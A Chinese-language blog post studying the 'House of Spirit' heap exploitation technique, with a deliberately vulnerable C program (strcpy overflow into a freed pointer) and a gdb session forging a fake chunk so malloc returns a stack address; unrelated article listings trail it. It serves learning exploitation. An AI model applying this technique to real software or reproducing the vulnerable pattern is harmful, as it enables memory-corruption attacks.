Malloc Maleficarum复盘
1.hos复盘
hos即伪造堆块,free栈上地址,然后下一个malloc去分配一个fastbin(栈上),包含返回地址。
代码来源
他这个我直接复现有问题,咨询了joker师傅,应该是gcc版本问题,导致局部变量位置不同。所以我直接gdb里暴力set去搞,反正就是个demo,学习下原理就好。
# muhe @ ubuntu in ~/Desktop/study [2:54:31]
$ ls
hos hos.c
# muhe @ ubuntu in ~/Desktop/study [2:54:33]
$ cat hos.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void fvuln(char *str1, int age)
{
char *ptr1;
int local_age;
char name[32];
char *ptr2;
local_age = age;
ptr1 = (char *) malloc(256);
printf("\nPTR1 = [ %p ]", ptr1);
strcpy(name, str1);
printf("\nPTR1 = [ %p ]\n", ptr1);
free(ptr1);
ptr2 = (char *) malloc(40);
snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
printf("\n%s\n", ptr2);
}
int main(int argc, char *argv[])
{
int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};
if (argc == 3)
fvuln(argv[1], atoi(argv[2]));
return 0;
}
# muhe @ ubuntu in ~/Desktop/study [2:54:35]
$ gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos -g
# muhe @ ubuntu in ~/Desktop/study [2:54:45]
$ gdb ./hos -q
Reading symbols from ./hos...done.
gdb-peda$ pdisass fvuln
Dump of assembler code for function fvuln:
0x080484fb <+0>: push ebp
0x080484fc <+1>: mov ebp,esp
0x080484fe <+3>: sub esp,0x2c
0x08048501 <+6>: mov eax,DWORD PTR [ebp+0xc]
0x08048504 <+9>: mov DWORD PTR [ebp-0x4],eax
0x08048507 <+12>: push 0x100
0x0804850c <+17>: call 0x80483b0 <malloc@plt>
0x08048511 <+22>: add esp,0x4
0x08048514 <+25>: mov DWORD PTR [ebp-0x8],eax
0x08048517 <+28>: push DWORD PTR [ebp-0x8]
0x0804851a <+31>: push 0x8048660
0x0804851f <+36>: call 0x8048380 <printf@plt>
0x08048524 <+41>: add esp,0x8
0x08048527 <+44>: push DWORD PTR [ebp+0x8]
0x0804852a <+47>: lea eax,[ebp-0x2c]
0x0804852d <+50>: push eax
0x0804852e <+51>: call 0x80483a0 <strcpy@plt>
0x08048533 <+56>: add esp,0x8
0x08048536 <+59>: push DWORD PTR [ebp-0x8]
0x08048539 <+62>: push 0x804866f
0x0804853e <+67>: call 0x8048380 <printf@plt>
0x08048543 <+72>: add esp,0x8
0x08048546 <+75>: push DWORD PTR [ebp-0x8]
0x08048549 <+78>: call 0x8048390 <free@plt>
0x0804854e <+83>: add esp,0x4
0x08048551 <+86>: push 0x28
0x08048553 <+88>: call 0x80483b0 <malloc@plt>
0x08048558 <+93>: add esp,0x4
0x0804855b <+96>: mov DWORD PTR [ebp-0xc],eax
0x0804855e <+99>: push DWORD PTR [ebp-0x4]
0x08048561 <+102>: lea eax,[ebp-0x2c]
0x08048564 <+105>: push eax
0x08048565 <+106>: push 0x804867f
0x0804856a <+111>: push 0x27
0x0804856c <+113>: push DWORD PTR [ebp-0xc]
0x0804856f <+116>: call 0x80483d0 <snprintf@plt>
0x08048574 <+121>: add esp,0x14
0x08048577 <+124>: push DWORD PTR [ebp-0xc]
0x0804857a <+127>: push 0x8048692
0x0804857f <+132>: call 0x8048380 <printf@plt>
0x08048584 <+137>: add esp,0x8
0x08048587 <+140>: nop
0x08048588 <+141>: leave
0x08048589 <+142>: ret
End of assembler dump.
gdb-peda$ b *0x0804850c
Breakpoint 1 at 0x804850c: file hos.c, line 14.
gdb-peda$ b *0x0804852e
Breakpoint 2 at 0x804852e: file hos.c, line 16.
gdb-peda$ b *0x08048549
Breakpoint 3 at 0x8048549: file hos.c, line 19.
gdb-peda$ b *0x08048553
Breakpoint 4 at 0x8048553: file hos.c, line 21.
gdb-peda$ r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc 20
Starting program: /home/muhe/Desktop/study/hos aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc 20
[----------------------------------registers-----------------------------------]
EAX: 0x14
EBX: 0x0
ECX: 0x0
EDX: 0x14
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0x100
EIP: 0x804850c (<fvuln+17>: call 0x80483b0 <malloc@plt>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048501 <fvuln+6>: mov eax,DWORD PTR [ebp+0xc]
0x8048504 <fvuln+9>: mov DWORD PTR [ebp-0x4],eax
0x8048507 <fvuln+12>: push 0x100
=> 0x804850c <fvuln+17>: call 0x80483b0 <malloc@plt>
0x8048511 <fvuln+22>: add esp,0x4
0x8048514 <fvuln+25>: mov DWORD PTR [ebp-0x8],eax
0x8048517 <fvuln+28>: push DWORD PTR [ebp-0x8]
0x804851a <fvuln+31>: push 0x8048660
Guessed arguments:
arg[0]: 0x100
arg[1]: 0x0
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x100
0004| 0xffffd520 --> 0x0
0008| 0xffffd524 --> 0xffffd5c4 --> 0x61b64d7e
0012| 0xffffd528 --> 0xf7fe76db (add esi,0x15925)
0016| 0xffffd52c --> 0x0
0020| 0xffffd530 --> 0xf7e39c45 (<strtol+5>: add eax,0x17f3bb)
0024| 0xffffd534 --> 0xf7e37040 (<atoi+16>: add esp,0x1c)
0028| 0xffffd538 --> 0xffffd851 --> 0x58003032 ('20')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0804850c in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:14
14 ptr1 = (char *) malloc(256);
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd520 --> 0x0
EBX: 0x0
ECX: 0x7fffffec
EDX: 0xf7fba870 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd518 --> 0xffffd520 --> 0x0
EIP: 0x804852e (<fvuln+51>: call 0x80483a0 <strcpy@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048527 <fvuln+44>: push DWORD PTR [ebp+0x8]
0x804852a <fvuln+47>: lea eax,[ebp-0x2c]
0x804852d <fvuln+50>: push eax
=> 0x804852e <fvuln+51>: call 0x80483a0 <strcpy@plt>
0x8048533 <fvuln+56>: add esp,0x8
0x8048536 <fvuln+59>: push DWORD PTR [ebp-0x8]
0x8048539 <fvuln+62>: push 0x804866f
0x804853e <fvuln+67>: call 0x8048380 <printf@plt>
Guessed arguments:
arg[0]: 0xffffd520 --> 0x0
arg[1]: 0xffffd828 ('a' <repeats 32 times>, "bbbbcccc")
[------------------------------------stack-------------------------------------]
0000| 0xffffd518 --> 0xffffd520 --> 0x0
0004| 0xffffd51c --> 0xffffd828 ('a' <repeats 32 times>, "bbbbcccc")
0008| 0xffffd520 --> 0x0
0012| 0xffffd524 --> 0xffffd5c4 --> 0x61b64d7e
0016| 0xffffd528 --> 0xf7fe76db (add esi,0x15925)
0020| 0xffffd52c --> 0x0
0024| 0xffffd530 --> 0xf7e39c45 (<strtol+5>: add eax,0x17f3bb)
0028| 0xffffd534 --> 0xf7e37040 (<atoi+16>: add esp,0x1c)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x0804852e in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:16
16 strcpy(name, str1);
gdb-peda$ c
Continuing.
PTR1 = [ 0x804b008 ]
PTR1 = [ 0x63636363 ]
[----------------------------------registers-----------------------------------]
EAX: 0x17
EBX: 0x0
ECX: 0x7fffffeb
EDX: 0xf7fba870 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c ("cccc", 'a' <repeats 32 times>, "bbbbcccc")
EIP: 0x8048549 (<fvuln+78>: call 0x8048390 <free@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804853e <fvuln+67>: call 0x8048380 <printf@plt>
0x8048543 <fvuln+72>: add esp,0x8
0x8048546 <fvuln+75>: push DWORD PTR [ebp-0x8]
=> 0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
Guessed arguments:
arg[0]: 0x63636363 ('cccc')
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c ("cccc", 'a' <repeats 32 times>, "bbbbcccc")
0004| 0xffffd520 ('a' <repeats 32 times>, "bbbbcccc")
0008| 0xffffd524 ('a' <repeats 28 times>, "bbbbcccc")
0012| 0xffffd528 ('a' <repeats 24 times>, "bbbbcccc")
0016| 0xffffd52c ('a' <repeats 20 times>, "bbbbcccc")
0020| 0xffffd530 ('a' <repeats 16 times>, "bbbbcccc")
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 3, 0x08048549 in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:19
19 free(ptr1);
gdb-peda$ x/10wx $esp
0xffffd51c: 0x63636363 0x61616161 0x61616161 0x61616161
0xffffd52c: 0x61616161 0x61616161 0x61616161 0x61616161
0xffffd53c: 0x61616161 0x62626262
gdb-peda$ set *(int*)0xffffd51c = 0xffffd530
gdb-peda$ x/10wx 0xffffd530 - 8
0xffffd528: 0x61616161 0x61616161 0x61616161 0x61616161
0xffffd538: 0x61616161 0x61616161 0x62626262 0x63636363
0xffffd548: 0x00000000 0xffffd588
gdb-peda$ set *(int*)0xffffd528=0x0
gdb-peda$ set *(int*)0xffffd52c=0x31
gdb-peda$ x/10wx 0xffffd530 - 8 + 0x30
0xffffd558: 0x00000014 0x00000000 0x00000000 0x00000000
0xffffd568: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffd578: 0x0000000a 0x00000000
gdb-peda$ set *(int*)0xffffd558 = 0x31
gdb-peda$ set *(int*)0xffffd55c = 0x30
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xf7fb9000 --> 0x1aedb0
EDX: 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0xffffd530 --> 0x0
EIP: 0x804854e (<fvuln+83>: add esp,0x4)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048543 <fvuln+72>: add esp,0x8
0x8048546 <fvuln+75>: push DWORD PTR [ebp-0x8]
0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
=> 0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0xffffd530 --> 0x0
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804854e 19 free(ptr1);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xf7fb9000 --> 0x1aedb0
EDX: 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd520 ("aaaaaaaa")
EIP: 0x8048551 (<fvuln+86>: push 0x28)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048546 <fvuln+75>: push DWORD PTR [ebp-0x8]
0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
0x804854e <fvuln+83>: add esp,0x4
=> 0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd520 ("aaaaaaaa")
0004| 0xffffd524 ("aaaa")
0008| 0xffffd528 --> 0x0
0012| 0xffffd52c --> 0x31 ('1')
0016| 0xffffd530 --> 0x0
0020| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0024| 0xffffd538 ("aaaaaaaabbbbcccc")
0028| 0xffffd53c ("aaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
21 ptr2 = (char *) malloc(40);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xf7fb9000 --> 0x1aedb0
EDX: 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0x28 ('(')
EIP: 0x8048553 (<fvuln+88>: call 0x80483b0 <malloc@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
=> 0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
0x8048561 <fvuln+102>: lea eax,[ebp-0x2c]
Guessed arguments:
arg[0]: 0x28 ('(')
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x28 ('(')
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 4, 0x08048553 in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x31) at hos.c:21
21 ptr2 = (char *) malloc(40);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd530 --> 0x0
EBX: 0x0
ECX: 0xf7fb9780 --> 0x0
EDX: 0xffffd530 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0x28 ('(')
EIP: 0x8048558 (<fvuln+93>: add esp,0x4)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
=> 0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
0x8048561 <fvuln+102>: lea eax,[ebp-0x2c]
0x8048564 <fvuln+105>: push eax
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x28 ('(')
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048558 21 ptr2 = (char *) malloc(40);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd530 --> 0x0
EBX: 0x0
ECX: 0xf7fb9780 --> 0x0
EDX: 0xffffd530 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd520 ("aaaaaaaa")
EIP: 0x804855b (<fvuln+96>: mov DWORD PTR [ebp-0xc],eax)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
=> 0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
0x8048561 <fvuln+102>: lea eax,[ebp-0x2c]
0x8048564 <fvuln+105>: push eax
0x8048565 <fvuln+106>: push 0x804867f
[------------------------------------stack-------------------------------------]
0000| 0xffffd520 ("aaaaaaaa")
0004| 0xffffd524 ("aaaa")
0008| 0xffffd528 --> 0x0
0012| 0xffffd52c --> 0x31 ('1')
0016| 0xffffd530 --> 0x0
0020| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0024| 0xffffd538 ("aaaaaaaabbbbcccc")
0028| 0xffffd53c ("aaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804855b 21 ptr2 = (char *) malloc(40);
gdb-peda$
2.hop TBU
3.hom TBU
4.hof TBU
5.hol TBU
6.hoc TBU
Malloc Maleficarum复盘的更多相关文章
- 胖哈勃杯Pwn400、Pwn500详解
概述 这次的胖哈博杯我出了Pwn400.Pwn500两道题目,这里讲一下出题和解题的思路.我个人感觉前两年的Pwn题更多的是考察单一的利用技巧,比我这有个洞怎么利用它拿到权限.但是我研究了一些最近的题 ...
- how2heap 源码及输出
备个份,慢慢写总结 1 first_fit #include <stdio.h> #include <stdlib.h> #include <string.h> i ...
- ApacheCN 网络安全译文集 20211025 更新
Android 渗透测试学习手册 中文版 第一章 Android 安全入门 第二章 准备实验环境 第三章 Android 应用的逆向和审计 第四章 对 Android 设备进行流量分析 第五章 And ...
- malloc 与 free函数详解<转载>
malloc和free函数详解 本文介绍malloc和free函数的内容. 在C中,对内存的管理是相当重要.下面开始介绍这两个函数: 一.malloc()和free()的基本概念以及基本用法: 1 ...
- C 语言中 malloc、calloc、realloc 和free 函数的使用方法
C标准函数库中,常见的堆上内存管理函数有malloc(), calloc(), recalloc(), free(). 之所以使用堆,是因为栈只能用来保存临时变量.局部变量和函数参数.在函数返回时,自 ...
- 以冒泡排序为例--malloc/free 重定向stdin stdout
esort.c 代码如下,可关注下mallloc/free,freopen重定向的用法,排序为每轮将最小的数放在最前面: #include<stdio.h> #include<mal ...
- 内存动态分配之realloc(),malloc(),calloc()与new运算符
1,malloc与free是C/C++的标准库函数,new/delete是C++的运算符,是C++面向对象的特征,它们都可用于申请动态内存和释放内存.2,对于非内部数据类型的对象而言,光用maloc/ ...
- 在dll里malloc/new/cvCreate分配内存,在exe里free/Releases释放内存时会出错。
写了个程序,在DLL中用malloc分配了一块内存,但是在exe程序中释放,结果程序crash,原因就是:其原因可能是堆被损坏,这也说明 TestMySticker.exe 中或它所加载的任何 DLL ...
- Linux C 堆内存管理函数malloc()、calloc()、realloc()、free()详解
C 编程中,经常需要操作的内存可分为下面几个类别: 堆栈区(stack):由编译器自动分配与释放,存放函数的参数值,局部变量,临时变量等等,它们获取的方式都是由编译器自动执行的 堆区(heap):一般 ...
随机推荐
- 一次简单的springboot+dubbo+flume+kafka+storm+redis系统
最近无事学习一下,用springboot+dubbo+flume+kafka+storm+redis做了一个简单的scenic系统 scenicweb:展现层,springboot+dubbo sce ...
- stuff拼接字符串
stuff stuff(param1,startIndex,length,param2) 说明:将param1中自startIndex(SQL中都是从1开始,而非0)起,删除length个字符,然后用 ...
- 数据库数据导入/导出报错:无法在只读列“Id”中插入数据。
本文仅供小白参考,大佬请随意...... 本例是:从vs 2017自带的localDB数据库的数据---导出到---->Sql Server 2008中的相应数据库中 1. 导出数据库: 2. ...
- js二维数组转一维数组
方法一 利用es5的arr.reduce(callback[, initialValue])实现 var arr1 = [[0, 1], [2, 3], [4, 5]]; var arr2 = arr ...
- JVM垃圾回收那些事
Java这种VM类跨平台语言比起C++这种传统编译型语言很大的区别之一在于引入了垃圾自动回收机制.自动垃圾回收大大提高了Java程序员的开发效率并且极大地减少了犯错的概率,但终归而言由于无法像C++程 ...
- java_day11_IO流
第十一章:IO流 1.流的概念 流是个抽象的概念,是对输入输出设备的抽象,Java程序中,对于数据的输入/输出操作都是以"流"的方式进行.设备可以是文件,网络,内存等 流具有方向性 ...
- laravel5.8 IoC 容器
网上 对容器的解释有很多,这里只是记录,搬运! 1.简单理解: 2019-10-10 11:24:09 解析 lavarel 容器 IoC 容器 作用 就是 “解耦” .“依赖注入(DI) IoC 容 ...
- 构建虚拟工控环境系列 - 西门子虚拟PLC
一. 概述 跟随着工控安全一路走来,工控安全市场今年明显有相当大的改善,无论从政策还是客户需求,都在逐步扩大中.但是,搞工控安全研究的人员却寥寥无几.一方面工控安全是个跨学课的技术,需要了解多方面的知 ...
- java 权限控制
网上或参考书中,对于java权限控制大多给出一张看似很整齐很好记实则不好理解的表格,我整理了一个2.0升级版,自认为会好理解很多,希望可以有所帮助. 同一包内 不同包内 修饰符 当前类 非当前类(含子 ...
- 1.opencv_画图
#导入工具包 import numpy as np import cv2 import matplotlib.pyplot as plt # 定义显示图片 def show(image): plt.i ...